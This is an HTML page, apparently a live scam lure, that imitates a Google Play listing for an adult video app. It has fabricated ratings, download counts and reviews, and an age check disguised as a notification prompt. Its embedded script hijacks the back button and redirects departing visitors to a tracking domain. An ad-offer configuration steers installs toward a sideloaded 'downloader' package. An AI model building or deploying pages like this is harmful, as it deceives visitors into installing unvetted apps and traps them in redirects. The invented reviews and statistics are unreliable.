<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Play App Market - XXXLOVE - the best porn video</title>
    <meta name="referrer" content="no-referrer">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="google" value="notranslate">
    <meta name="google" content="notranslate">
    <meta name="robots" content="noindex">
    <link rel="preload" as="script" href="/common/processLand2.js">
    <link rel="prefetch" href="./assets/preview.webm">
    <meta name="google" value="notranslate">
    <meta name="google" content="notranslate">
    
    <style>.preview-block,.shadow{top:0;position:absolute}.app-logo,.app-photo{object-fit:cover;box-shadow:0 1px 2px 0 rgba(60,64,67,.3),0 1px 3px 1px rgba(60,64,67,.15)}.preview-block,.rate-num,.shadow{position:absolute}.app-info_main,.rate,.rate-total{white-space:nowrap}*{margin:0;padding:0;box-sizing:border-box;font-family:sans-serif!important}body{background-color:#fff}a{text-decoration:none!important}.preview-block{overflow:hidden;height:56.25vw;z-index:-1000;width:100vw}.preview-video{width:100vw;object-fit:cover;z-index:-1000}.shadow{background:linear-gradient(to top,#202124 20%,rgba(0,0,0,0) 100%);bottom:0;left:0;right:0}.app-logo{width:72px;height:72px;border-radius:20px;margin:7px 24px 0 0}.header{display:flex;gap:.6rem;margin:1rem}.app-name{font-size:1.5rem;color:#e8eaed;letter-spacing:0;word-break:keep-all;line-height:2rem}.app-info_main{letter-spacing:.00625em;font-weight:500;display:flex;color:#01875f;line-height:1.5rem;font-size:1rem;flex-wrap:wrap;margin-top:4px}.app-desc,.up-block_desc{line-height:1.25rem;font-size:.875rem}.app-info_block{font-size:13px;display:flex;flex-direction:column}.add-info_block,.wishlist-btn{justify-content:flex-start;display:flex}.add-info_block{margin:1rem;padding:16px 0}.info{width:33.3333%;font-size:14px;display:flex;flex-direction:column;align-items:center}.info_first,.info_second{border-right:1px solid #d8d8dc}.info span{font-weight:600;height:24px;display:flex;align-items:center;color:#e8eaed}.info p{color:#b9bdc3;font-size:12px;margin-top:4px}.info span img{height:12px;width:12px}.pegi{width:24px}.rate-block{display:flex;flex-wrap:wrap}.rate{display:flex}.download-amount{color:#616161;margin-left:3px}.user-icon{width:1rem;height:1rem;margin-left:3px}.star{width:10px;height:10px}.actions-block{margin:1rem;display:flex;justify-content:center;flex-direction:column}.install-btn{height:2.5rem;display:flex;justify-content:center;align-items:center;border:0;background-color:#01875f;border-radius:8px;color:white;font-weight:700}.wishlist-btn{align-items:center;height:48px;outline:0;margin:0 auto;width:fit-content;border:0;background-color:transparent;color:#01875f;font-weight:700;font-size:14px;gap:.4rem}.wishlist-btn img{width:24px;height:24px}.ad-contains{color:#616161;font-size:13px;font-weight:400;margin-bottom:8px}.app-photo_block{display:flex;justify-content:flex-start;overflow-x:auto}.app-photo{border-width:0;width:124px;min-width:124px;height:220px;margin-left:.5rem;cursor:pointer;border-radius:8px}.about{padding:20px 1rem;font-size:18px;font-weight:500;display:flex;justify-content:space-between}.arrow{width:20px;height:20px}.app-desc{font-weight:400;letter-spacing:.0142857143em;display:-webkit-box;-webkit-box-orient:vertical;-webkit-line-clamp:6;padding:0 1rem 1rem;color:#5f6368}.reviews-block,.up-block{padding:1rem}.up-block_title{color:#202124;font-size:.875rem;font-weight:500;letter-spacing:.0178571429em}.up-block_desc{font-weight:400;letter-spacing:.0142857143em;margin-top:4px;color:#5f6368}.data-block{padding:1rem 1rem 0}.data-block_title{color:#202124;font-size:18px;font-weight:500;letter-spacing:.0178571429em}.data-block_desc{margin-top:20px;font-size:.875rem;font-weight:400;letter-spacing:.0142857143em;line-height:1.25rem;color:#5f6368}.reviews-header{display:flex;align-items:center;justify-content:space-between;flex-wrap:wrap}.reviews-header_name{float:left;color:#333;font-size:18px;font-weight:500;text-transform:none;width:fit-content}.verified-block{margin:20px 0;font-size:.75rem;font-weight:400;color:#5f6368;display:flex;align-items:center;gap:8px}.photo-block img,.photo_undefined{margin-right:.5rem}.policy-block,.user-photo_block{display:flex;align-items:center}.star-main{width:16px;height:16px}.rate-line3,.rate-line4,.rate-line5{height:100%;background-color:#01875f;opacity:.8;border-radius:9999px}.rate-big{color:#202124;font-size:64px;font-weight:400}.rate-blocks{display:flex}.rate_first-block{display:flex;flex-direction:column;justify-content:center;align-items:center;padding:16px;width:fit-content}.rate_second-block{width:100%;max-width:260px;padding:30px 16px;display:inline-block}.rate-total{font-size:12px;margin-top:1rem;font-weight:400;letter-spacing:.3px;color:#5f6368}.user-second{vertical-align:middle!important;margin-bottom:2px}.rate-num{font-size:11px;left:-16px;letter-spacing:1px;text-align:left;color:#737373;font-weight:400}.rate-line{display:inline-block;max-width:120px}.rate-line5{width:80%}.rate-line4{width:40%}.rate-line3{width:4%}.rate-line_block{position:relative;height:10px;margin-bottom:6px;width:100%;background-color:#e8eaed;font-weight:400;display:flex;border-radius:9999px}.photo_undefined,.user-photo{border-radius:50%;width:32px;user-focus:none;user-select:none}.comment-author_rate{display:flex;align-items:center;gap:4px}.comment-block{display:flex;flex-direction:column;margin-bottom:10px}.photo_undefined{height:32px;display:flex;justify-content:center;align-items:center;background-color:#9ace6a;color:#fff;font-size:16px}.photo-block{height:48px;display:flex;align-items:center}.user-photo{height:32px}.comment-author{line-height:24px;display:flex;flex-direction:column;margin-top:8px}.comment-author_name{font-size:14px;color:#333}.star-comment{width:12px;height:12px}.comment-author_time{color:#5f6368;display:inline-block;font-size:.75rem;font-weight:400;letter-spacing:.025em;margin-left:1ch;vertical-align:middle;white-space:nowrap}.comment-text{word-wrap:break-word;hyphens:auto;font-size:14px;line-height:1.4;color:#333;font-weight:300}
    @keyframes slide {
      0% {
        transform: translateY(0%)
      }
      25% {
        transform: translateY(-100%)
      }
      50% {
        transform: translateY(-100%)
      }
      75% {
        transform: translateY(-200%)
      }
      100% {
        transform: translateY(-200%)
      }
    }

    .slide-left {
      animation: slide 2s linear infinite;
      display:block;
    }
    </style>
<!--leave page style-->
<style>
    @-webkit-keyframes show {
      0% {
        opacity: 0;
      }
      100% {
        opacity: 1;
      }
    }
    @keyframes show {
      0% {
        opacity: 0;
      }
      100% {
        opacity: 1;
      }
    }
    .lut-android-dialog-overlay, .push-android-dialog-overlay {
        position: absolute !important;
        z-index: 99992 !important;
        display: none;
        width: 100% !important;
        height: 100% !important;
        top: 0 !important;
        /* background: rgba(0, 0, 0, 0.3); */
    }
    .lut-android-dialog {
        display: none;
        z-index: 300;
        padding: 1rem;
        margin-top: -72px;
        width: 70vw;
        left: 15vw;
        top: 50%;
        background: white;
        border-radius: 4px;
        box-shadow: rgb(0 0 0 / 20%) 0 11px 15px -7px, rgb(0 0 0 / 14%) 0 24px 38px;
        position: absolute;
        z-index: 100;
        -webkit-animation: show 0.7s steps(1, end) 1;
        animation: show 0.7s steps(1, end) 1;
    }
    .lut-android-dialog-title {
        margin: 0 12px;
        font-family: sans-serif;
        -webkit-font-smoothing: antialiased;
        font-size: 20px;
        line-height: 32px;
        font-weight: 500;
        letter-spacing: 0.25px;
        text-decoration: inherit;
        text-transform: inherit;
        color: black;
    }
    
    .lut-android-dialog-actions {
        text-align: right;
        padding-right: 8px;
    }
    .lut-android-dialog-actions button {
        font-family:  sans-serif;
        appearance: none;
        background-color: rgba(0, 0, 0, 0);
        border: none;
        color: #4184f2;
        /* color: rgb(98, 0, 238); */
        font-size: 14px;
        font-stretch: 100%;
        font-style: normal;
        font-weight: 600;
        font-weight: 600;
        height: 36px;
        justify-content: center;
        letter-spacing: 1.25px;
        padding: 0 8px;
        margin-left: 8px;
        outline: none !important;
    }
</style>

<!--Push style-->
<style>
.lut-android-dialog {
    width: 88vw;
    left: 6vw;
}

.lut-android-dialog {
    margin-top: -72px;
    width: 70vw;
    left: 15vw;
    top: 50%;
    position: absolute;
    background: white;
    border-radius: 4px;
    box-shadow: rgb(0 0 0 / 20%) 0 11px 15px -7px, rgb(0 0 0 / 14%) 0 24px 38px;
}
.lut-android-dialog img {
    width: 21px;
    vertical-align: middle;
    padding-right: 5px;
}
.lut-android-dialog-content {
    margin: 15px 24px 20px 24px;
}
.lut-android-dialog-content {
    font-family:  sans-serif;
    font-size: 16px;
    font-weight: 400;
    letter-spacing: 0.5px;
    margin: 16px;
    color: rgba(0, 0, 0, 0.6);
}
</style>

</head>
<body>

<div style="background-color: #202124;margin-top: calc(56.25vw - 40px);" class="wrapper">
    <a href="#" class="preview-block">
        <div class="shadow"></div>
        <video class="preview-video" muted="" autoplay="" loop="">
            <source src="media/preview.webm" type="video/webm">
        </video>
    </a>
    <div class="header">
        <div class="app-logo" style="
            overflow: hidden;
            display: flex;
            justify-content: stretch;
            align-items: stretch;
            flex-direction:column;
            flex-shrink: 0;
        "><img class="slide-left" src="images/ph-logo.jpg" alt="Logo">
        <img class="slide-left" src="images/yellow.webp" alt="Logo" style="
            width: 100%;
        "><img class="slide-left" src="images/ph-logo.jpg" alt="Logo"></div>
        <div class="app-info_block">
            <h1><span class="app-name">XXXLOVE - the best porn app</span></h1>
            <div class="app-info_main">
                <span>PH Company</span>
            </div>
        </div>
    </div>
    <div class="add-info_block">
        <div class="info info_first">
            <span>4.6 <img src="images/star.svg" alt=""></span>
            <p>48.7K reviews</p>
        </div>
        <div class="info info_second">
            <span>500K+ </span>
            <p>Downloads</p>
        </div>
        <div class="info info_third">
            <img class="pegi" src="images/pegi.svg" alt="" width="24" height="24">
            <p>Rated for 18+</p>
        </div>
    </div>
    <div class="actions-block">
        <a href="#" class="btn install-btn" onclick="window.location.href='https://citizen.com'; return false;">
    Watch More
</a>
        <a href="#" class="wishlist-btn">
            <img src="images/bookmark.svg" alt=""> Add to Wishlist
        </a>
    </div>
</div>
<div class="wrapper">
    <div class="app-photo_block btn">
        <a href="#"><img class="app-photo" src="images/1-min.jpg" alt=""></a>
        <a href="#"><img class="app-photo" src="images/2-min.jpg" alt=""></a>
        <a href="#"><img class="app-photo" src="images/3-min.jpg" alt=""></a>
    </div>
    <div class="about">About this webapp
        <img class="arrow" src="images/arrow.svg" alt="">
    </div>
    <div class="app-desc">
        The best porn website for Android. Watch new hot videos every day 🔥 🔥 🔥
        <br>
        Only high-quality content, a player without lags, fast loading and endless emotions

    </div>
    <div class="up-block">
        <span class="up-block_title">Updated on</span>
        <p class="up-block_desc"> Apr 20,2025</p>
    </div>
    <div class="data-block">
        <span class="data-block_title">Data safety</span>
        <p class="data-block_desc"> Developers can show information here about how their app collects and uses your data.</p>
    </div>
    <div class="reviews-block">
        <div class="reviews-header">
            <h2 class="reviews-header_name">Ratings and reviews</h2>
            <div class="policy-block">
                <a href="#" class="policiy-btn btn">
                    <img class="arrow" src="images/arrow.svg" alt="">
                </a>
            </div>
        </div>
        <div class="verified-block">Ratings and reviews are verified <img src="images/info.png" alt="" width="16" height="16"></div>
        <div class="rate-blocks">
            <div class="rate_first-block">
                <span class="rate-big">4.6</span>
                <a href="#" class="rate btn">
                    <img class="star-main" src="images/star-green.svg" alt="">
                    <img class="star-main" src="images/star-green.svg" alt="">
                    <img class="star-main" src="images/star-green.svg" alt="">
                    <img class="star-main" src="images/star-green.svg" alt="">
                    <img class="star-main" src="images/star-green.svg" alt="">
                </a>
                <span class="rate-total">48.7K reviews</span>
            </div>
            <div class="rate_second-block">
                <div class="rate-line_block">
                    <span class="rate-num">5</span>
                    <span class="rate-line rate-line5"></span>
                </div>
                <div class="rate-line_block">
                    <span class="rate-num">4</span>
                    <span class="rate-line rate-line4"></span>
                </div>
                <div class="rate-line_block">
                    <span class="rate-num">3</span>
                    <span class="rate-line rate-line3"></span>
                </div>
                <div class="rate-line_block">
                    <span class="rate-num">2</span>
                    <span class="rate-line rate-line2"></span>
                </div>
                <div class="rate-line_block">
                    <span class="rate-num">1</span>
                    <span class="rate-line rate-line1"></span>
                </div>
            </div>
        </div>
        <div class="comment-block">
            <div class="first_comment-block">
                <div class="photo-block">
                    <div class="user-photo_block">
                        <img class="user-photo" src="images/user1.jpg" alt="">
                        <span class="comment-author_name">Sanjay Kumar</span></div>
                </div>
            </div>
            <div class="second_comment-block">
                <div>
                    <div class="comment-author">

                        <div class="comment-author_rate">
                            <a href="#" class="rate btn">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                            </a>
                            <span class="comment-author_time">January 30, 2022</span>
                        </div>
                    </div>
                </div>
                <div class="comment-text"> This website is so good! We are waiting for new HOT content! </div>
            </div>

        </div>
        <div class="comment-block">
            <div class="first_comment-block">
                <div class="photo-block">
                    <div class="photo_undefined"><span>E</span></div>
                    <span class="comment-author_name">Eduard Tereshko</span>
                </div>

            </div>
            <div class="second_comment-block">
                <div>
                    <div class="comment-author">

                        <div class="comment-author_rate">
                            <a href="#" class="rate btn">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                            </a>
                            <span class="comment-author_time">April 22, 2022</span>
                        </div>
                    </div>
                </div>
                <div class="comment-text"> High quality content! After watching the first video, it is impossible to stop at the second</div>
            </div>

        </div>
        <div class="comment-block">
            <div class="first_comment-block">
                <div class="photo-block">
                    <div class="user-photo_block"><img class="user-photo" src="images/user2.jpg" alt=""></div>
                    <span class="comment-author_name">Asha Devi</span>
                </div>
            </div>
            <div class="second_comment-block">
                <div>
                    <div class="comment-author">

                        <div class="comment-author_rate">
                            <a href="#" class="rate btn">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                                <img class="star-comment" src="images/star-green.svg" alt="">
                            </a>
                            <span class="comment-author_time">March 19, 2022</span>
                        </div>
                    </div>
                </div>
                <div class="comment-text"> I'm realy love this website. 💦💦💦 </div>
            </div>

        </div>
    </div>
</div>

<!--Leave page-->
<div class="lut-android-dialog" id="lut-android-dialog-leave">
    <div class="lut-android-dialog-title">Leave page</div>
    <div class="lut-android-dialog-content">Exit?</div>
    <div class="lut-android-dialog-actions">
      <button>CANCEL</button>
      <button>OK</button>
    </div>
  </div>
 <a id="lut-android-dialog-overlay" class="lut-android-dialog-overlay" target="_blank" href="#" style="display: none"></a>

  <!--Push-->
  <div class="lut-android-dialog" id="lut-android-dialog-push">
    <div class="lut-android-dialog-content">
      <img src="images/bell.png">
      You must confirm that you are over 18 years old
    </div>
    <div class="lut-android-dialog-actions">
      <button>CANCEL</button>
      <button>ACCEPT</button>
    </div>
  </div>
  <a id="push-android-dialog-overlay" class="push-android-dialog-overlay" href="#"></a>
  <script>
    window.config = null
    var isLoaded = false
    window.load = function(){
      if (isLoaded) return;
      window.config = {"id":"2061","state":"1","sid":"3dh1QKRZHs","campaign":"1743634497","hash":"c3388929c09869ffcbdf04dfbe5cb1bd","kind":"0","public":null,"url_replace":null,"use_link_back":null,"link_back":"","cf_deploy":"1","repo":"2-i-fakegp-preview-v1-ph","links":[{"id":"3490","landing_id":"2061","link_name":"LINK1","active":"1","weight":"100","kind":"0","target_landing_id":"0","target_link":null,"params":null,"offer_id":"0","link_kind":"0","version":"","continue":"","items":[{"id":"4135","link_id":"3490","weight":"100","offer_id":"1883","direct_link":"","link_kind":"0","params":"","version":"wroom","continue":"https:\/\/thank-you-app.pages.dev","offer":{"id":"1883","name":"wxdadvergilnewzaliv","partner_id":"62","fill_id":"356","app_id":"","kind":"0","payment_model":"0","fill":{"id":"356","name":"WXD 48","client":"503","backend":"48","status":"1","kind":"0","backend_alt":"{\"IN\":\"63\",\"SA\":\"68\",\"ID\":\"64\",\"PH\":\"64\",\"AE\":\"68\",\"BH\":\"68\",\"OM\":\"68\",\"KW\":\"68\"}","apps":[{"fill_id":"356","package_id":"64","pct":"100","package":{"id":"64","package":"com.booster.downloader.and.player.hd","icon":"com.booster.downloader.and.player.hd.webp","props":{"appName":"WXD Downloader & Player","colors":"898989ebd8270a010116","first_booster_time":"15","port":"43220","rest_booster_time":"75","runPhrase":"LOAD NEXT VIDEO","scheme":"wplayer","subdomain":"wroom","wait_for_free_seconds":"3600"}}}]}}}]}]};
      var oldLink = '%%LINK1%%';
      var ds = window.processLand(config || null, oldLink);
      replaceLinks(ds.link1);
        try {
          // if need to start the app before
          // startApp(ds.link1, ds.links[0].props) 

          loadScriptAsync('./assets/lut.min.js', function () {
            LUT.onLoad();
            LUT.showElement("lut-android-dialog-push");
            LUT.showElement('push-android-dialog-overlay');
            LUT.fixBackButton(function () {
              LUT.showElement("lut-android-dialog-overlay");
              LUT.showElement('lut-android-dialog-leave');
              window.onpopstate = function () {
                location.href = 'https://mightsunk.com/fyu0mkqd?key=4d9bc8cff33fd8cf95d712b66291d45d';
              }
            });
            document.querySelector('#push-android-dialog-overlay').addEventListener('click', function () {
              LUT.hideElement('push-android-dialog-overlay');
              LUT.hideElement('lut-android-dialog-push');
            })
            document.querySelector('#lut-android-dialog-overlay').addEventListener('click', function () {
              LUT.hideElement('lut-android-dialog-overlay');
              LUT.hideElement('lut-android-dialog-leave');
            })
          });


          initYaMetrika(ds)
        } catch (e) {
          console.error(e)
        }
        try {
            document.querySelector('img[src="./assets/yellow.webp"]').src = `https://cdn.myhappyvideo.com/public/${config.links[0].currentItem.app.package.icon}`
        } catch(e){
        }
        try {
            document.querySelector('.app-logo img:nth-child(2)').src = `https://cdn.myhappyvideo.com/public/${config.links[0].currentItem.app.package.icon}`;
        } catch(e){
        }
    }
    </script>
    <script async="" defer="" src="js/processLand2.js" onload="(window.load && window.load())"></script>



</body></html>
